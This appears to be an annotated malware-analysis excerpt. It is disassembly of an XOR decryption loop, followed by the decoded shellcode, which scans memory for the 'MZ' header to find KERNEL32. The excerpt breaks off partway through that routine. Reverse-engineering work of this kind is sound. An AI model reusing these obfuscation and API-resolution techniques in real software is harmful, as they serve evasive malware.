Unobfuscates memory range 0x0041CB17-0x0041CBAA 0x41C14B: 51 PUSH ECX 0x41C14C: 33C9 XOR ECX,ECX 0x41C14E: E800000000 CALL 0x41C153 0x41C153: 5F POP EDI 0x41C154: 81C7C4090000 ADD EDI,0x9C4 0x41C15A: 5A POP EDX 0x41C15B: 83C215 ADD EDX,0x15 0x41C15E: 0FB60439 MOVZX EAX,DWORD PTR [ECX+EDI] 0x41C162: 33C2 XOR EAX,EDX 0x41C164: 880439 MOV DWORD PTR [ECX+EDI],AL 0x41C167: 41 INC ECX 0x41C168: 81F993000000 CMP ECX,0x93 0x41C16E: 72EE JB 0x41C15E 0x41C170: EB05 JMP 0x41C177 before the execution of the loop 0x41CB17: 9E SAHF 0x41CB18: 49 DEC ECX 0x41CB19: 313573AE1515 XOR DWORD PTR [0x1515AE73],ESI 0x41CB1F: 1AA21638584F SBB AH,BYTE PTR [EDX+0x4F583816] 0x41CB25: 1515611D94 ADC EAX,0x941D6115 0x41CB2A: FE15151415FE INC BYTE PTR [0xFE151415] 0x41CB30: FB STI 0x41CB31: 9E SAHF 0x41CB32: EE OUT DX,AL ... after the execution of the loop 0x41CB17: 8B5C2420 MOV EBX,DWORD PTR [ESP+0x20] 0x41CB1B: 66BB0000 MOV BX,0x0 0x41CB1F: 0FB703 MOVZX EAX,WORD PTR [EBX] ; <==0x0041CB2F(*+0x10) 0x41CB22: 2D4D5A0000 SUB EAX,0x5A4D ; Looking for "MZ" 0x41CB27: 7408 JE 0x0001CB31 ; (0x41CB31); (*+0xA) 0x41CB29: 81EB00000100 SUB EBX,0x10000 0x41CB2F: EBEE JMP 0x0001CB1F ; (0x41CB1F); (*-0x10) 0x41CB31: 8BFB MOV EDI,EBX ; <==0x0041CB27(*-0xA) 0x41CB33: 037B3C ADD EDI,DWORD PTR [EBX+0x3C] ; File Header for KERNEL32.